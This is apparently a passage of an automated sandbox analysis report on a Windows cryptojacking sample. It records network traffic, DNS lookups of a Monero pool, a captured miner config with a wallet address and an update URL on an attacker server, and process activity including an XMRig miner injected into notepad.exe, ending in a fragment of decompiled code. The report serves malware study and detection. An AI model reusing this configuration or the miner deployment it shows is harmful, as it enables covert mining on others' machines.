Jul 23, 2021 22:24:57.931662083 CEST | 80    | 49717 | 45.144.225.135 | 192.168.2.5
Jul 23, 2021 22:24:57.931746960 CEST | 80    | 49717 | 45.144.225.135 | 192.168.2.5
Jul 23, 2021 22:24:57.933772087 CEST | 49717 | 80    | 192.168.2.5    | 45.144.225.135
Jul 23, 2021 22:24:59.907031059 CEST | 49718 | 14444 | 192.168.2.5    | 192.99.69.170
Jul 23, 2021 22:25:00.013876915 CEST | 14444 | 49718 | 192.99.69.170  | 192.168.2.5
Jul 23, 2021 22:25:00.014043093 CEST | 49718 | 14444 | 192.168.2.5    | 192.99.69.170
Jul 23, 2021 22:25:00.014426947 CEST | 49718 | 14444 | 192.168.2.5    | 192.99.69.170
Jul 23, 2021 22:25:00.121150970 CEST | 14444 | 49718 | 192.99.69.170  | 192.168.2.5
Jul 23, 2021 22:25:00.277209044 CEST | 14444 | 49718 | 192.99.69.170  | 192.168.2.5
Jul 23, 2021 22:25:00.321520090 CEST | 49718 | 14444 | 192.168.2.5    | 192.99.69.170
Jul 23, 2021 22:25:02.587523937 CEST | 14444 | 49718 | 192.99.69.170  | 192.168.2.5
Jul 23, 2021 22:25:02.634296894 CEST | 49718 | 14444 | 192.168.2.5    | 192.99.69.170
Jul 23, 2021 22:25:02.936403036 CEST | 80    | 49717 | 45.144.225.135 | 192.168.2.5
Jul 23, 2021 22:25:02.936625004 CEST | 49717 | 80    | 192.168.2.5    | 45.144.225.135
Jul 23, 2021 22:25:12.651432991 CEST | 14444 | 49718 | 192.99.69.170  | 192.168.2.5
Jul 23, 2021 22:25:12.822559118 CEST | 49718 | 14444 | 192.168.2.5    | 192.99.69.170
Jul 23, 2021 22:25:21.483308077 CEST | 14444 | 49718 | 192.99.69.170  | 192.168.2.5
Jul 23, 2021 22:25:21.635848045 CEST | 49718 | 14444 | 192.168.2.5    | 192.99.69.170
Jul 23, 2021 22:25:57.044884920 CEST | 14444 | 49718 | 192.99.69.170  | 192.168.2.5
Jul 23, 2021 22:25:57.184679031 CEST | 49718 | 14444 | 192.168.2.5    | 192.99.69.170
Jul 23, 2021 22:26:17.031966925 CEST | 49728 | 14444 | 192.168.2.5    | 192.99.69.170
Jul 23, 2021 22:26:17.138820887 CEST | 14444 | 49728 | 192.99.69.170  | 192.168.2.5
Jul 23, 2021 22:26:17.138916016 CEST | 49728 | 14444 | 192.168.2.5    | 192.99.69.170
Jul 23, 2021 22:26:17.139066935 CEST | 49728 | 14444 | 192.168.2.5    | 192.99.69.170
Jul 23, 2021 22:26:17.247169018 CEST | 14444 | 49728 | 192.99.69.170  | 192.168.2.5
Jul 23, 2021 22:26:17.409806967 CEST | 14444 | 49728 | 192.99.69.170  | 192.168.2.5
Jul 23, 2021 22:26:17.452634096 CEST | 49728 | 14444 | 192.168.2.5    | 192.99.69.170
Jul 23, 2021 22:26:20.789201021 CEST | 49717 | 80    | 192.168.2.5    | 45.144.225.135
Jul 23, 2021 22:26:21.186917067 CEST | 49717 | 80    | 192.168.2.5    | 45.144.225.135
Jul 23, 2021 22:26:21.889945030 CEST | 49717 | 80    | 192.168.2.5    | 45.144.225.135
Jul 23, 2021 22:26:23.186880112 CEST | 49717 | 80    | 192.168.2.5    | 45.144.225.135
Jul 23, 2021 22:26:24.255654097 CEST | 14444 | 49718 | 192.99.69.170  | 192.168.2.5
Jul 23, 2021 22:26:24.390126944 CEST | 49718 | 14444 | 192.168.2.5    | 192.99.69.170
Jul 23, 2021 22:26:24.601206064 CEST | 14444 | 49728 | 192.99.69.170  | 192.168.2.5
                                                                                                      Jul 23, 2021 22:26:24.733905077 CEST4972814444192.168.2.5192.99.69.170
                                                                                                      Jul 23, 2021 22:26:25.687134981 CEST4971780192.168.2.545.144.225.135
                                                                                                      Jul 23, 2021 22:26:30.578176022 CEST4971780192.168.2.545.144.225.135
                                                                                                      Jul 23, 2021 22:26:40.188358068 CEST4971780192.168.2.545.144.225.135

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 23, 2021 22:23:58.690275908 CEST | 64344 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:23:58.718857050 CEST | 53 | 64344 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:23:59.855005026 CEST | 62060 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:23:59.883245945 CEST | 53 | 62060 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:24:02.336838007 CEST | 61805 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:24:02.371587992 CEST | 53 | 61805 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:24:04.242376089 CEST | 54795 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:24:04.268502951 CEST | 53 | 54795 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:24:05.166677952 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:24:05.204323053 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:24:06.831135035 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:24:06.869446993 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:24:07.958920002 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:24:07.986876965 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:24:08.882920027 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:24:08.910356045 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:24:09.702557087 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:24:09.737869024 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:24:10.774203062 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:24:10.807658911 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:24:13.018903971 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:24:13.047286987 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:24:13.896255970 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:24:13.924731016 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:24:25.512311935 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:24:25.547977924 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:24:26.495665073 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:24:26.531744003 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:24:32.500754118 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:24:32.549395084 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:24:52.521028042 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:24:52.567465067 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:24:59.864423990 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:24:59.900419950 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:25:08.450411081 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:25:08.498393059 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:25:13.650739908 CEST | 55016 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:25:13.688097954 CEST | 53 | 55016 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:25:44.704058886 CEST | 64345 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:25:44.751039028 CEST | 53 | 64345 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:26:07.158816099 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:26:07.206656933 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:26:16.991628885 CEST | 54791 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:26:17.026262999 CEST | 53 | 54791 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:26:53.637018919 CEST | 50463 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:26:53.674973011 CEST | 53 | 50463 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:26:56.800901890 CEST | 50394 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:26:56.839250088 CEST | 53 | 50394 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:27:00.175929070 CEST | 58530 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:27:00.210777044 CEST | 53 | 58530 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:27:02.634422064 CEST | 53813 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:27:02.667859077 CEST | 53 | 53813 | 8.8.8.8 | 192.168.2.5
Jul 23, 2021 22:27:04.692172050 CEST | 63732 | 53 | 192.168.2.5 | 8.8.8.8
Jul 23, 2021 22:27:04.735693932 CEST | 53 | 63732 | 8.8.8.8 | 192.168.2.5

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 23, 2021 22:24:59.864423990 CEST | 192.168.2.5 | 8.8.8.8 | 0x3194 | Standard query (0) | xmr-us-east1.nanopool.org | A (IP address) | IN (0x0001)
Jul 23, 2021 22:26:16.991628885 CEST | 192.168.2.5 | 8.8.8.8 | 0xe0d9 | Standard query (0) | xmr-us-east1.nanopool.org | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 23, 2021 22:24:59.900419950 CEST | 8.8.8.8 | 192.168.2.5 | 0x3194 | No error (0) | xmr-us-east1.nanopool.org | | 144.217.14.139 | A (IP address) | IN (0x0001)
Jul 23, 2021 22:24:59.900419950 CEST | 8.8.8.8 | 192.168.2.5 | 0x3194 | No error (0) | xmr-us-east1.nanopool.org | | 144.217.14.109 | A (IP address) | IN (0x0001)
Jul 23, 2021 22:24:59.900419950 CEST | 8.8.8.8 | 192.168.2.5 | 0x3194 | No error (0) | xmr-us-east1.nanopool.org | | 142.44.242.100 | A (IP address) | IN (0x0001)
Jul 23, 2021 22:24:59.900419950 CEST | 8.8.8.8 | 192.168.2.5 | 0x3194 | No error (0) | xmr-us-east1.nanopool.org | | 142.44.243.6 | A (IP address) | IN (0x0001)
Jul 23, 2021 22:24:59.900419950 CEST | 8.8.8.8 | 192.168.2.5 | 0x3194 | No error (0) | xmr-us-east1.nanopool.org | | 192.99.69.170 | A (IP address) | IN (0x0001)
Jul 23, 2021 22:26:17.026262999 CEST | 8.8.8.8 | 192.168.2.5 | 0xe0d9 | No error (0) | xmr-us-east1.nanopool.org | | 144.217.14.139 | A (IP address) | IN (0x0001)
Jul 23, 2021 22:26:17.026262999 CEST | 8.8.8.8 | 192.168.2.5 | 0xe0d9 | No error (0) | xmr-us-east1.nanopool.org | | 144.217.14.109 | A (IP address) | IN (0x0001)
Jul 23, 2021 22:26:17.026262999 CEST | 8.8.8.8 | 192.168.2.5 | 0xe0d9 | No error (0) | xmr-us-east1.nanopool.org | | 142.44.242.100 | A (IP address) | IN (0x0001)
Jul 23, 2021 22:26:17.026262999 CEST | 8.8.8.8 | 192.168.2.5 | 0xe0d9 | No error (0) | xmr-us-east1.nanopool.org | | 142.44.243.6 | A (IP address) | IN (0x0001)
Jul 23, 2021 22:26:17.026262999 CEST | 8.8.8.8 | 192.168.2.5 | 0xe0d9 | No error (0) | xmr-us-east1.nanopool.org | | 192.99.69.170 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• 45.144.225.135

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49717 | 45.144.225.135 | 80 | C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe

Timestamp | kBytes transferred | Direction | Data
Jul 23, 2021 22:24:57.900317907 CEST | 1402 | OUT | GET /config.txt HTTP/1.1
Accept: text/*, application/exe, application/zlib, application/gzip, application/applefile
User-Agent: WinInetGet/0.1
Host: 45.144.225.135
Connection: Keep-Alive
Cache-Control: no-cache
Jul 23, 2021 22:24:57.931662083 CEST | 1404 | IN | HTTP/1.1 200 OK
Date: Fri, 23 Jul 2021 20:24:57 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Fri, 23 Jul 2021 15:42:46 GMT
ETag: "776-5c7cc41474980"
Accept-Ranges: bytes
Content-Length: 1910
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8
Data Ascii:
[Miner]
address=48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos    ; XMR address, email (minergate), btc address (nicehash), etc.
poolport=xmr-us-east1.nanopool.org:14444    ; Do not include 'stratum+tcp://' e.g monerohash.com:3333
password=    ; Pool password
stop=0    ; Change this value to "1" to stop miner. If not specified or equal to "0" miner will work.
proxy=0    ; Change this value to "1" if you are mining to xmrig-proxy instead of pool. This enables using a unqiue address per worker for better miner monitoring.
keepalive=0    ; 0 to disable keepalive, 1 to enable keepalive

[Update]
;config_url=http://xmrminer.net/config.txt    ; You can update the url that points to the configuration file. Must begin with "http://" or "https://"
knock_time=30    ; Number of minutes the miner waits between visits to config file. If never specified, default is 30 minutes.
update_url=http://45.144.225.135/notepad.exe    ; url of new miner. Miner wil
Jul 23, 2021 22:24:57.931746960 CEST | 1405 | IN
Data Ascii:
l get updated with this file.
update_hash=d572da9202196121d952231f26d65d07    ; md5 hash of new miner file. 32 characters long (16 byte hexadecimal format for hash). You need to specify this value, othewise miner will not get updated!
;End

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior
System Behavior

General

Start time: 22:24:06
Start date: 23/07/2021
Path: C:\Users\user\Desktop\4rC1bQcnl5.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\4rC1bQcnl5.exe'
Imagebase: 0xa20000
File size: 3627520 bytes
MD5 hash: D572DA9202196121D952231F26D65D07
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: low

General

Start time: 22:24:15
Start date: 23/07/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 22:24:21
Start date: 23/07/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 22:24:31
Start date: 23/07/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 22:24:31
Start date: 23/07/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 22:24:32
Start date: 23/07/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:22:24:32
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:22:24:33
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:22:24:33
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                      Imagebase:0x7ff76b760000
                                                                                                      File size:163336 bytes
                                                                                                      MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:22:24:34
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:22:24:44
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:22:24:50
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
                                                                                                      Imagebase:0x20000
                                                                                                      File size:3627520 bytes
                                                                                                      MD5 hash:D572DA9202196121D952231F26D65D07
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 24%, ReversingLabs
                                                                                                      Reputation:low

                                                                                                      General

                                                                                                      Start time:22:24:51
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
                                                                                                      Imagebase:0xc20000
                                                                                                      File size:3627520 bytes
                                                                                                      MD5 hash:D572DA9202196121D952231F26D65D07
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000002.496587950.0000000001480000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.496587950.0000000001480000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.504581184.00000000037C0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                      General

                                                                                                      Start time:22:24:53
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe
                                                                                                      Imagebase:0xdc0000
                                                                                                      File size:909312 bytes
                                                                                                      MD5 hash:77276DDC82248473D033E2494C438A97
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.327781499.0000000001460000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.332660306.0000000001460000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.329749766.0000000001460000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                      General

                                                                                                      Start time:22:24:57
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\notepad.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg'
                                                                                                      Imagebase:0x7ff6f6cb0000
                                                                                                      File size:245760 bytes
                                                                                                      MD5 hash:BB9A06B8F2DD9D24C77F389D7B2B58D2
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000002.495647676.00000000009D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000002.496766519.0000020F8DC2A000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                      General

                                                                                                      Start time:22:25:20
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
                                                                                                      Imagebase:0x150000
                                                                                                      File size:232960 bytes
                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      General

                                                                                                      Start time:22:25:21
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      General

                                                                                                      Start time:22:25:21
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
                                                                                                      Imagebase:0xa50000
                                                                                                      File size:147456 bytes
                                                                                                      MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      General

                                                                                                      Start time:22:25:35
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                                      Imagebase:0x7ff777c00000
                                                                                                      File size:455656 bytes
                                                                                                      MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      General

                                                                                                      Start time:22:25:37
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Disassembly

                                                                                                      Code Analysis

                                                                                                        Executed Functions

                                                                                                        C-Code - Quality: 78%
                                                                                                        			E00403CA0(char* __ecx, void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                        				char _v12;
                                                                                                        				intOrPtr _v16;
                                                                                                        				char _v20;
                                                                                                        				char _v24;
                                                                                                        				long _v28;
                                                                                                        				void* _v32;
                                                                                                        				long _v36;
                                                                                                        				long _v40;
                                                                                                        				intOrPtr _v44;
                                                                                                        				char* _v48;
                                                                                                        				long _v52;
                                                                                                        				void* _v56;
                                                                                                        				long _v60;
                                                                                                        				void* _v64;
                                                                                                        				long _v68;
                                                                                                        				long _v72;
                                                                                                        				struct _SYSTEM_INFO _v108;
                                                                                                        				char _v2156;
                                                                                                        				char _v2676;
                                                                                                        				void* _t129;
                                                                                                        				char* _t132;
                                                                                                        				signed int _t137;
                                                                                                        				void* _t139;
                                                                                                        				long _t150;
                                                                                                        				char* _t282;
                                                                                                        				char* _t284;
                                                                                                        				void* _t321;
                                                                                                        				void* _t323;
                                                                                                        				void* _t334;
                                                                                                        				void* _t336;
                                                                                                        
                                                                                                        				_t334 = __edx;
                                                                                                        				_t331 = __ecx;
                                                                                                        				_t129 =  *0x5d2df0; // 0x324
                                                                                                        				_t336 = _a4;
                                                                                                        				if(_t336 == 0) {
                                                                                                        					_t129 =  *0x5d2124; // 0x3d0
                                                                                                        				}
                                                                                                        				if(_t129 != 0 && _t129 != 0xffffffff) {
                                                                                                        					NtClose(_t129);
                                                                                                        				}
                                                                                                        				E00401A00( &_v2676, "C:\ProgramData\LKBNMTFJgl");
                                                                                                        				_t132 =  &_v2676;
                                                                                                        				if(_t336 == 0) {
                                                                                                        					_push(L"\\cfg");
                                                                                                        				} else {
                                                                                                        					_push(L"\\cfgi");
                                                                                                        				}
                                                                                                        				_push(_t132);
                                                                                                        				E00401970();
                                                                                                        				E00401BB0( &_v2156, 0, 0x800);
                                                                                                        				_a4 = 0;
                                                                                                        				_v56 = 0;
                                                                                                        				asm("xorps xmm0, xmm0");
                                                                                                        				_v36 = 0;
                                                                                                        				asm("movups [ebp-0x30], xmm0");
                                                                                                        				_v32 = 0;
                                                                                                        				_v28 = 0;
                                                                                                        				_v64 = 0;
                                                                                                        				_v60 = 0;
                                                                                                        				_v72 = 0;
                                                                                                        				_v68 = 0;
                                                                                                        				GetSystemInfo( &_v108); // executed
                                                                                                        				if(_t336 != 0) {
                                                                                                        					_t137 = _v108.dwNumberOfProcessors;
                                                                                                        					if( *0x5d130c != 1) {
                                                                                                        						goto L11;
                                                                                                        					} else {
                                                                                                        						if(_t137 >= 1) {
